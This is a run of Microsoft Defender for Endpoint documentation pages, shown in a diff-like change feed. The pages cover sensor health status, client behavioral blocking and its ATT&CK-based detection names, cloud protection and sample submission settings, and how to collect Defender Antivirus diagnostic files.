-| Change tamper protection settings using a Mobile Device Management (MDM) solution | To change the tamper protection mode using an MDM, go to the configuration profile and change the enforcement level in [Intune](tamperprotection-macos.md#intune) or [JAMF](tamperprotection-macos.md#jamf).<br/><br/>The configuration profile set with the MDM will be your first point of reference. Any settings defined in the profile will be enforced on the device, and built-in-protection default settings won't override these applied settings. |
-| Temporarily disable tamper protection on a device for troubleshooting purposes | See the following articles:<br/>- [Get started with troubleshooting mode in Microsoft Defender for Endpoint](enable-troubleshooting-mode.md)<br/>- [Troubleshooting mode scenarios in Microsoft Defender for Endpoint](troubleshooting-mode-scenarios.md) |
-
-## See also
--- [Tech Community blog: Tamper protection will be turned on for all enterprise customers](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/tamper-protection-will-be-turned-on-for-all-enterprise-customers/ba-p/3616478)-- [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)-- [Manage endpoint security in Microsoft Intune](/mem/intune/protect/endpoint-security)-- [Configure Microsoft Defender for Endpoint in Intune](/mem/intune/protect/advanced-threat-protection-configure)-- [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)-- [Responding to ransomware attacks](../defender/playbook-responding-ransomware-m365-defender.md)
security Check Sensor Status https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/check-sensor-status.md
- Title: Check the device health at Microsoft Defender for Endpoint
-description: Check the sensor health on devices to identify which ones are misconfigured, inactive, or aren't reporting sensor data.
-------- m365-security-- tier2- Previously updated : 05/16/2023--
-# Check service health at Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-checksensor-abovefoldlink)
-
-The **Device health** tile provides information on the individual device's ability to provide sensor data and communicate with the Defender for Endpoint service. It reports how many devices require attention and helps you identify problematic devices and take action to correct known issues.
-
-There are two status indicators on the tile that provide information on the number of devices that aren't reporting properly to the service:
--- **Misconfigured** - These devices might partially be reporting sensor data to the Defender for Endpoint service and might have configuration errors that need to be corrected.-- **Inactive** - Devices that have stopped reporting to the Defender for Endpoint service for more than seven days in the past month.-
-Clicking any of the groups directs you to **Device inventory**, filtered according to your choice.
-
-On **Device inventory**, you can filter the health state list by the following status:
--- **Active** - Devices that are actively reporting to the Defender for Endpoint service.-- **Misconfigured** - These devices might partially be reporting sensor data to the Defender for Endpoint service but have configuration errors that need to be corrected. Misconfigured devices can have either one or a combination of the following issues:
- - **No sensor data** - Devices has stopped sending sensor data. Limited alerts can be triggered from the device.
- - **Impaired communications** - Ability to communicate with device is impaired. Sending files for deep analysis, blocking files, isolating device from network and other actions that require communication with the device may not work.
-- **Inactive** - Devices that have stopped reporting to the Defender for Endpoint service.-
-You can also download the entire list in CSV format using the **Export** feature. For more information on filters, see [View and organize the Devices list](machines-view-overview.md).
-
-> [!NOTE]
-> Export the list in CSV format to display the unfiltered data. The CSV file will include all devices in the organization, regardless of any filtering applied in the view itself and can take a significant amount of time to download, depending on how large your organization is.
--
-You can view the device details when you click on a misconfigured or inactive device.
-
-## See also
--- [Fix unhealthy sensors in Defender for Endpoint](fix-unhealthy-sensors.md)-- [Client analyzer overview](overview-client-analyzer.md)-- [Download and run the client analyzer](download-client-analyzer.md)-- [Run the client analyzer on Windows](run-analyzer-windows.md)-- [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md)-- [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)
security Client Behavioral Blocking https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/client-behavioral-blocking.md
- Title: Client behavioral blocking
-description: Client behavioral blocking is part of behavioral blocking and containment capabilities at Microsoft Defender for Endpoint
-------
- - next-gen
- - mde-ngp
--- m365-security-- tier2 Previously updated : 12/18/2020--
-# Client behavioral blocking
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platform**
-- Windows-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-## Overview
-
-Client behavioral blocking is a component of [behavioral blocking and containment capabilities](behavioral-blocking-containment.md) in Defender for Endpoint. As suspicious behaviors are detected on devices (also referred to as clients or endpoints), artifacts (such as files or applications) are blocked, checked, and remediated automatically.
--
-Antivirus protection works best when paired with cloud protection.
-
-## How client behavioral blocking works
-
-[Microsoft Defender Antivirus](microsoft-defender-antivirus-in-windows-10.md) can detect suspicious behavior, malicious code, fileless and in-memory attacks, and more on a device. When suspicious behaviors are detected, Microsoft Defender Antivirus monitors and sends those suspicious behaviors and their process trees to the cloud protection service. Machine learning differentiates between malicious applications and good behaviors within milliseconds, and classifies each artifact. In almost real time, as soon as an artifact is found to be malicious, it's blocked on the device.
-
-Whenever a suspicious behavior is detected, an [alert](alerts-queue.md) is generated and is visible while the attack was detected and stopped; alerts, such as an "initial access alert," are triggered and appear in the [Microsoft Defender portal](/microsoft-365/security/defender/microsoft-365-defender) (formerly Microsoft Defender XDR).
-
-Client behavioral blocking is effective because it not only helps prevent an attack from starting, it can help stop an attack that has begun executing. And, with [feedback-loop blocking](feedback-loop-blocking.md) (another capability of behavioral blocking and containment), attacks are prevented on other devices in your organization.
-
-## Behavior-based detections
-
-Behavior-based detections are named according to the [MITRE ATT&CK Matrix for Enterprise](https://attack.mitre.org/matrices/enterprise). The naming convention helps identify the attack stage where the malicious behavior was observed:
-
-|Tactic|Detection threat name|
-|||
-|Initial Access|`Behavior:Win32/InitialAccess.*!ml`|
-|Execution|`Behavior:Win32/Execution.*!ml`|
-|Persistence|`Behavior:Win32/Persistence.*!ml`|
-|Privilege Escalation|`Behavior:Win32/PrivilegeEscalation.*!ml`|
-|Defense Evasion|`Behavior:Win32/DefenseEvasion.*!ml`|
-|Credential Access|`Behavior:Win32/CredentialAccess.*!ml`|
-|Discovery|`Behavior:Win32/Discovery.*!ml`|
-|Lateral Movement|`Behavior:Win32/LateralMovement.*!ml`|
-|Collection|`Behavior:Win32/Collection.*!ml`|
-|Command and Control|`Behavior:Win32/CommandAndControl.*!ml`|
-|Exfiltration|`Behavior:Win32/Exfiltration.*!ml`|
-|Impact|`Behavior:Win32/Impact.*!ml`|
-|Uncategorized|`Behavior:Win32/Generic.*!ml`|
-
-> [!TIP]
-> To learn more about specific threats, see **[recent global threat activity](https://www.microsoft.com/wdsi/threats)**.
-
-## Configuring client behavioral blocking
-
-If your organization is using Defender for Endpoint, client behavioral blocking is enabled by default. However, to benefit from all Defender for Endpoint capabilities, including [behavioral blocking and containment](behavioral-blocking-containment.md), make sure the following features and capabilities of Defender for Endpoint are enabled and configured:
--- [Defender for Endpoint baselines](configure-machines-security-baseline.md)-- [Devices onboarded to Defender for Endpoint](onboard-configure.md)-- [EDR in block mode](edr-in-block-mode.md)-- [Attack surface reduction](attack-surface-reduction.md)-- [Next-generation protection](configure-microsoft-defender-antivirus-features.md) (antivirus, antimalware, and other threat protection capabilities)-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Cloud Protection Microsoft Antivirus Sample Submission https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-antivirus-sample-submission.md
- Title: Cloud protection and sample submission at Microsoft Defender Antivirus
-description: Learn about cloud-delivered protection and Microsoft Defender Antivirus
------- Previously updated : 02/18/2024--- m365-security-- tier2-- mde-ngp--
-# Cloud protection and sample submission at Microsoft Defender Antivirus
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-- macOS-- Linux--- Windows Server-
-Microsoft Defender Antivirus uses many intelligent mechanisms for detecting malware. One of the most powerful capabilities is the ability to apply the power of the cloud to detect malware and perform rapid analysis. Cloud protection and automatic sample submission work together with Microsoft Defender Antivirus to help protect against new and emerging threats.
-
-If a suspicious or malicious file is detected, a sample is sent to the cloud service for analysis while Microsoft Defender Antivirus blocks the file. As soon as a determination is made, which happens quickly, the file is either released or blocked by Microsoft Defender Antivirus.
-
-This article provides an overview of cloud protection and automatic sample submission at Microsoft Defender Antivirus. To learn more about cloud protection, see [Cloud protection and Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md).
-
-## How cloud protection and sample submission work together
-
-To understand how cloud protection works together with sample submission, it can be helpful to understand how Defender for Endpoint protects against threats. The Microsoft Intelligent Security Graph monitors threat data from a vast network of sensors. Microsoft layers cloud-based machine-learning models that can assess files based on signals from the client and the vast network of sensors and data in the Intelligent Security Graph. This approach gives Defender for Endpoint the ability to block many never-before-seen threats.
-
-The following image depicts the flow of cloud protection and sample submission with Microsoft Defender Antivirus:
--
-Microsoft Defender Antivirus and cloud protection automatically block most new, never-before-seen threats at first sight by using the following methods:
-
-1. Lightweight client-based machine-learning models, blocking new and unknown malware.
-
-2. Local behavioral analysis, stopping file-based and file-less attacks.
-
-3. High-precision antivirus, detecting common malware through generic and heuristic techniques.
-
-1. Advanced cloud-based protection is provided for cases when Microsoft Defender Antivirus running on the endpoint needs more intelligence to verify the intent of a suspicious file.
-
- 1. In the event Microsoft Defender Antivirus can't make a clear determination, file metadata is sent to the cloud protection service. Often within milliseconds, the cloud protection service can determine based on the metadata as to whether the file is malicious or not a threat.
-
- - The cloud query of file metadata can be a result of behavior, mark of the web, or other characteristics where a clear verdict isn't determined.
- - A small metadata payload is sent, with the goal of reaching a verdict of malware or not a threat. The metadata doesn't include personally identifiable information (PII). Information such as filenames, are hashed.
- - Can be synchronous or asynchronous. For synchronous, the file won't open until the cloud renders a verdict. For asynchronous, the file opens while cloud protection performs its analysis.
- - Metadata can include PE attributes, static file attributes, dynamic and contextual attributes, and more (see [Examples of metadata sent to the cloud protection service](#examples-of-metadata-sent-to-the-cloud-protection-service)).
-
- 1. After examining the metadata, if Microsoft Defender Antivirus cloud protection can't reach a conclusive verdict, it can request a sample of the file for further inspection. This request honors the settings configuration for sample submission:
-
- 1. **Send safe samples automatically**
- - Safe samples are samples considered to not commonly contain PII data like: .bat, .scr, .dll, .exe.
- - If file is likely to contain PII, the user gets a request to allow file sample submission.
- - This option is the default on Windows, macOS, and Linux.
-
- 1. **Always Prompt**
- - If configured, the user is always prompted for consent before file submission
- - This setting isn't available in macOS and Linux cloud protection
-
- 3. **Send all samples automatically**
- - If configured, all samples are sent automatically
- - If you would like sample submission to include macros embedded in Word docs, you must choose "Send all samples automatically"
- - This setting isn't available on macOS cloud protection
-
- 1. **Do not send**
- - Prevents "block at first sight" based on file sample analysis
- - "Don't send" is the equivalent to the "Disabled" setting in macOS policy and "None" setting in Linux policy.
- - Metadata is sent for detections even when sample submission is disabled
-
- 1. After files are submitted to cloud protection, the submitted files can be **scanned**, **detonated**, and processed through **big data analysis** **machine-learning** models to reach a verdict. Turning off cloud-delivered protection limits analysis to only what the client can provide through local machine-learning models, and similar functions.
-
-> [!IMPORTANT]
-> [Block at first sight (BAFS)](configure-block-at-first-sight-microsoft-defender-antivirus.md) provides detonation and analysis to determine whether a file or process is safe. BAFS can delay the opening of a file momentarily until a verdict is reached. If you disable sample submission, BAFS is also disabled, and file analysis is limited to metadata only. We recommend keeping sample submission and BAFS enabled. To learn more, see [What is "block at first sight"?](configure-block-at-first-sight-microsoft-defender-antivirus.md#what-is-block-at-first-sight)
-
-## Cloud protection levels
-
-Cloud protection is enabled by default at Microsoft Defender Antivirus. We recommend that you keep cloud protection enabled, although you can configure the protection level for your organization. See [Specify the cloud-delivered protection level for Microsoft Defender Antivirus](specify-cloud-protection-level-microsoft-defender-antivirus.md).
-
-## Sample submission settings
-
-In addition to configuring your cloud protection level, you can configure your sample submission settings. You can choose from several options:
--- **Send safe samples automatically** (the default behavior)-- **Send all samples automatically** -- **Do not send samples** -
-> [!TIP]
-> Using the `Send all samples automatically` option provides for better security, because phishing attacks are used for a high amount of [initial access attacks](https://attack.mitre.org/tactics/TA0001/).
-For information about configuration options using Intune, Configuration Manager, Group Policy, or PowerShell, see [Turn on cloud protection at Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md).
-
-## Examples of metadata sent to the cloud protection service
--
-The following table lists examples of metadata sent for analysis by cloud protection:
-
-| Type | Attribute |
-|:|:|
-| Machine attributes | `OS version` <br/> `Processor` <br/> `Security settings` |
-| Dynamic and contextual attributes | **Process and installation** <br/> `ProcessName` <br/> `ParentProcess` <br/> `TriggeringSignature` <br/> `TriggeringFile` <br/> `Download IP and url` <br/> `HashedFullPath` <br/> `Vpath` <br/> `RealPath` <br/> `Parent/child relationships` <br/><br/>**Behavioral** <br/> `Connection IPs` <br/> `System changes` <br/> `API calls` <br/> `Process injection` <br/><br/>**Locale** <br/> `Locale setting` <br/> `Geographical location` |
-| Static file attributes | **Partial and full hashes** <br/> `ClusterHash` <br/> `Crc16` <br/> `Ctph` <br/> `ExtendedKcrcs` <br/> `ImpHash` <br/> `Kcrc3n` <br/> `Lshash` <br/> `LsHashs` <br/> `PartialCrc1` <br/> `PartialCrc2` <br/> `PartialCrc3` <br/> `Sha1` <br/> `Sha256` <br/><br/>**File properties** <br/>`FileName` <br/> `FileSize` <br/><br/> **Signer information** <br/> `AuthentiCodeHash` <br/> `Issuer` <br/> `IssuerHash` <br/> `Publisher` <br/> `Signer` <br/> `SignerHash` |
-
-## Samples are treated as customer data
-
-Just in case you're wondering what happens with sample submissions, Defender for Endpoint treats all file samples as customer data. Microsoft honors both the geographical and data retention choices your organization selected when onboarding to Defender for Endpoint.
-
-In addition, Defender for Endpoint has received multiple compliance certifications, demonstrating continued adherence to a sophisticated set of compliance controls:
--- ISO 27001-- ISO 27018-- SOC I, II, III-- PCI-
-For more information, see the following resources:
--- [Azure Compliance Offerings](/azure/storage/common/storage-compliance-offerings) -- [Service Trust Portal](https://servicetrust.microsoft.com)-- [Microsoft Defender for Endpoint data storage and privacy](data-storage-privacy.md#data-storage-location)-
-## Other file sample submission scenarios
-
-There are two more scenarios where Defender for Endpoint might request a file sample that isn't related to the cloud protection at Microsoft Defender Antivirus. These scenarios are described in the following table:
-
-| Scenario | Description |
-|:|:|
-|Manual file sample collection in the Microsoft Defender portal | When onboarding devices to Defender for Endpoint, you can configure settings for [endpoint detection and response (EDR)](overview-endpoint-detection-response.md). For example, there's a setting to enable sample collections from the device, which can easily be confused with the sample submission settings described in this article. <br/><br/>The EDR setting controls file sample collection from devices when requested through the Microsoft Defender portal, and is subject to the roles and permissions already established. This setting can allow or block file collection from the endpoint for features such as deep analysis in the Microsoft Defender portal. If this setting isn't configured, the default is to enable sample collection. <br/><br/>Learn about Defender for Endpoint configuration settings, see: [Onboarding tools and methods for Windows 10 devices in Defender for Endpoint](configure-endpoints.md) |
-| Automated investigation and response content analysis | When [automated investigations](automated-investigations.md) are running on devices (when configured to run automatically in response to an alert or manually run), files that are identified as suspicious can be collected from the endpoints for further inspection. If necessary, the file content analysis feature for automated investigations can be disabled in the Microsoft Defender portal. <br/><br/> The file extension names can also be modified to add or remove extensions for other file types that will be automatically submitted during an automated investigation. <br/><br/> To learn more, see [Manage automation file uploads](manage-automation-file-uploads.md). |
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## See also
-
-[Next-generation protection overview](next-generation-protection.md)
-
-[Configure remediation for Microsoft Defender Antivirus detections.](configure-remediation-microsoft-defender-antivirus.md)
security Cloud Protection Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus.md
- Title: Cloud protection and Microsoft Defender Antivirus
-description: Learn about cloud protection and Microsoft Defender Antivirus
-------- Previously updated : 11/03/2023--- m365-security-- tier2-- mde-ngp--
-# Cloud protection and Microsoft Defender Antivirus
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Individuals](https://www.microsoft.com/en-us/microsoft-365/microsoft-defender-for-individuals)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Next-generation technologies in Microsoft Defender Antivirus provide near-instant, automated protection against new and emerging threats. To identify new threats dynamically, next-generation technologies work with large sets of interconnected data in the Microsoft Intelligent Security Graph and powerful artificial intelligence (AI) systems driven by advanced machine learning models. Cloud protection works together with Microsoft Defender Antivirus to deliver accurate, real-time, and intelligent protection.
-
-[:::image type="content" source="medi)
-
-> [!TIP]
-> We recommend keeping cloud protection turned on. To learn more, see [Why cloud protection should be turned on](enable-cloud-protection-microsoft-defender-antivirus.md#why-cloud-protection-should-be-turned-on).
-
-## How cloud protection works
-
-Microsoft Defender Antivirus works seamlessly with Microsoft cloud services. These cloud protection services, also referred to as Microsoft Advanced Protection Service (MAPS), enhance standard real-time protection. With cloud protection, next-generation technologies provide rapid identification of new threats, sometimes even before a single endpoint is infected.
-
-The following blog posts illustrate how cloud protection works:
--- [Get to know the advanced technologies at the core of Microsoft Defender for Endpoint next-generation protection](https://www.microsoft.com/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/)--- [Why Microsoft Defender Antivirus is the most deployed in the enterprise](https://www.microsoft.com/security/blog/2018/03/22/why-windows-defender-antivirus-is-the-most-deployed-in-the-enterprise) --- [Behavior monitoring combined with machine learning spoils a massive coin-mining campaign](https://www.microsoft.com/security/blog/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign)--- [How artificial intelligence stopped an "Emotet" outbreak](https://www.microsoft.com/security/blog/2018/02/14/how-artificial-intelligence-stopped-an-emotet-outbreak)--- [Detonating a bad rabbit: Microsoft Defender Antivirus and layered machine learning defenses](https://www.microsoft.com/security/blog/2017/12/11/detonating-a-bad-rabbit-windows-defender-antivirus-and-layered-machine-learning-defenses)--- [Microsoft Defender Antivirus cloud protection service: Advanced real-time defense against never-before-seen malware](https://www.microsoft.com/security/blog/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware) --
-> [!NOTE]
-> The Microsoft Defender Antivirus cloud service is a mechanism for delivering updated protection to your network and endpoints. As a cloud service, it is not simply protection for files stored in the cloud; instead, the cloud service uses distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than traditional security intelligence updates.
-
-## How to get cloud protection
-
-Cloud protection is enabled by default. However, you might need to re-enable it if it has been disabled as part of previous organizational policies. To learn more, see [Turn on cloud protection](enable-cloud-protection-microsoft-defender-antivirus.md).
-
-If your subscription includes Windows 10 E5, you can take advantage of emergency dynamic intelligence updates, which provide near real-time protection from emerging threats. When you turn on cloud protection, fixes for malware issues can be delivered via the cloud within minutes, instead of waiting for the next update. See [Configure Microsoft Defender Antivirus to automatically receive new protection updates based on reports from our cloud service](manage-event-based-updates-microsoft-defender-antivirus.md#cloud-report-updates).
--
security Collect Diagnostic Data Update Compliance https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-diagnostic-data-update-compliance.md
- Title: Collect diagnostic data for Update Compliance and Microsoft Defender Antivirus
-description: Learn how to collect diagnostic data that's used by Microsoft support and engineering teams when they help with troubleshooting issues with Microsoft Defender Antivirus.
---- Previously updated : 08/22/2023------- m365-security-- tier2-- mde-ngp--
-# Collect update compliance diagnostic data for Microsoft Defender Antivirus assessment
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article describes how to collect diagnostic data that's used by Microsoft support and engineering teams when they help with troubleshooting issues with Microsoft Defender Antivirus.
-
-> [!NOTE]
-> For performance-specific issues related to Microsoft Defender Antivirus, see: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
-
-Before attempting this process, ensure you have read [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md), met all require prerequisites, and taken any other suggested troubleshooting steps.
-
-## Obtain the diagnostic file
-
-On at least two devices that aren't reporting or showing up in Update Compliance, obtain the `.cab` diagnostic file by taking the following steps:
-
-1. Open Command Prompt as an administrator by following these steps:
-
- a. Open the **Start** menu.
-
- b. Type **cmd**. Right-click on **Command Prompt** and then select **Run as administrator**.
-
- c. Specify administrator credentials or approve the prompt.
-
-2. Navigate to the Windows Defender directory. By default, it's `C:\Program Files\Windows Defender`.
-
-3. Type the following command, and then press **Enter**
-
- ```Dos
- mpcmdrun -getfiles
- ```
-
-4. A `.cab` file is generated that contains various diagnostic logs. The location of the file is specified in the output in the command prompt. By default, the location is `C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab`.
-
-5. Copy the `.cab` files to a location that can be accessed by Microsoft support. An example could be a password-protected OneDrive folder that you can share.
-
-6. Send an email using the <a href="mailto:ucsupport@microsoft.com?subject=MDAV assessment issue&body=I%20am%20encountering%20the%20following%20issue%20when%20using%20Windows%20Defender%20AV%20in%20Update%20Compliance%3a%20%0d%0aI%20have%20provided%20at%20least%202%20support%20.cab%20files%20at%20the%20following%20location%3a%20%3Caccessible%20share%2c%20including%20access%20details%20such%20as%20password%3E%0d%0aMy%20OMS%20workspace%20ID%20is%3a%20%0d%0aPlease%20contact%20me%20at%3a">update compliance support email template</a>, and fill out the template with the following information:
-
- ```text
- I am encountering the following issue when using Microsoft Defender Antivirus in Update Compliance:
-
- I have provided at least 2 support .cab files at the following location: <accessible share, including access details such as password>
-
- My OMS workspace ID is:
-
- Please contact me at:
- ```
-
-## See also
--- [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md)-- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security Collect Diagnostic Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-diagnostic-data.md
- Title: Collect diagnostic data of Microsoft Defender Antivirus
-description: Use a tool to collect data to troubleshoot Microsoft Defender Antivirus.
---- Previously updated : 03/07/2024------- m365-security-- tier2-- mde-ngp--
-# Collect Microsoft Defender Antivirus diagnostic data
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)--- Microsoft Defender Antivirus--- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-This article describes how to collect diagnostic data that's used by Microsoft support and engineering teams when they help troubleshoot issues with Microsoft Defender Antivirus.
-
-> [!NOTE]
-> As part of the investigation or response process, you can collect an investigation package from a device. Here's how: [Collect investigation package from devices](/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#collect-investigation-package-from-devices).
->
-> For performance-specific issues related to Microsoft Defender Antivirus, see: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
-
-## Get the diagnostic files
-
-On at least two devices that are experiencing the same issue, obtain the `.cab` diagnostic file by taking the following steps:
-
-1. Open Command Prompt as an administrator by following these steps:
-
- a. Open the **Start** menu.
-
- b. Type **cmd**. Right-click on **Command Prompt** and then select **Run as administrator**.
-
- c. Specify administrator credentials or approve the prompt.
-
-1. Navigate to the directory for Microsoft Defender Antivirus:
-
- `cd C:\ProgramData\Microsoft\Windows Defender\Platform\<version>`
-
- Where `<version>` is the actual version that starts with `4.18.2xxxx.x`
-
-1. Type the following command, and then press **Enter**
-
- ```Dos
- mpcmdrun.exe -GetFiles
- ```
-
-4. A `.cab` file is generated that contains various diagnostic logs. The location of the file is specified in the output in the command prompt. By default, the location is `C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab`.
-
- > [!NOTE]
- > To redirect the cab file to a different path or UNC share, use the following command:
- >
- > `mpcmdrun.exe -GetFiles -SupportLogLocation <path>`
- >
- > For more information, see [Redirect diagnostic data to a UNC share](#redirect-diagnostic-data-to-a-unc-share).
-
-5. Copy these .cab files to a location that can be accessed by Microsoft support. An example could be a password-protected OneDrive folder that you can share with us.
-
-## Redirect diagnostic data to a UNC share
-
-To collect diagnostic data on a central repository, you can specify the SupportLogLocation parameter.
-
-```Dos
-mpcmdrun.exe -GetFiles -SupportLogLocation <path>
-```
-
-Copies the diagnostic data to the specified path. If the path isn't specified, the diagnostic data is copied to the location specified in the Support Log Location Configuration.
-
-When the SupportLogLocation parameter is used, a folder structure like as follows will be created in the destination path:
-
-```Dos
-<path>\<MMDD>\MpSupport-<hostname>-<HHMM>.cab
-```
-
-|field|Description|
-|||
-|path|The path as specified on the command line or retrieved from configuration|
-|MMDD|Month and day when the diagnostic data was collected (for example, 0530)|
-|hostname|The hostname of the device on which the diagnostic data was collected|
-|HHMM|Hours and minutes when the diagnostic data was collected (for example, 1422)|
-
-> [!NOTE]
-> When using a file share please make sure that account used to collect the diagnostic package has write access to the share.
-
-## Specify location where diagnostic data is created
-
-You can also specify where the diagnostic `.cab` file is created using a Group Policy Object (GPO).
-
-1. Open the Local Group Policy Editor and find the SupportLogLocation GPO at: `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SupportLogLocation`.
-
-2. Select **Define the directory path to copy support log files**.
-
- :::image type="content" source="media/GPO1-SupportLogLocationDefender.png" alt-text="The local group policy editor" lightbox="media/GPO1-SupportLogLocationDefender.png":::
-
- :::image type="content" source="media/GPO2-SupportLogLocationGPPage.png" alt-text="The define path for log files setting" lightbox="media/GPO2-SupportLogLocationGPPage.png":::
-
- :::image type="content" source="media/GPO1-SupportLogLocationDefender.png" alt-text="The local group policy editor" lightbox="media/GPO1-SupportLogLocationDefender.png":::
-
- :::image type="content" source="media/GPO2-SupportLogLocationGPPage.png" alt-text="The define path for configuring the log files setting" lightbox="media/GPO2-SupportLogLocationGPPage.png":::
-
-3. Inside the policy editor, select **Enabled**.
-
-4. Specify the directory path where you want to copy the support log files in the **Options** field.
- :::image type="content" source="media/GPO3-SupportLogLocationGPPageEnabledExample.png" alt-text="The Enabled directory path custom setting" lightbox="media/GPO3-SupportLogLocationGPPageEnabledExample.png":::
-
-5. Select **OK** or **Apply**.
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
->
-
-## See also
--- [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md)-- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-
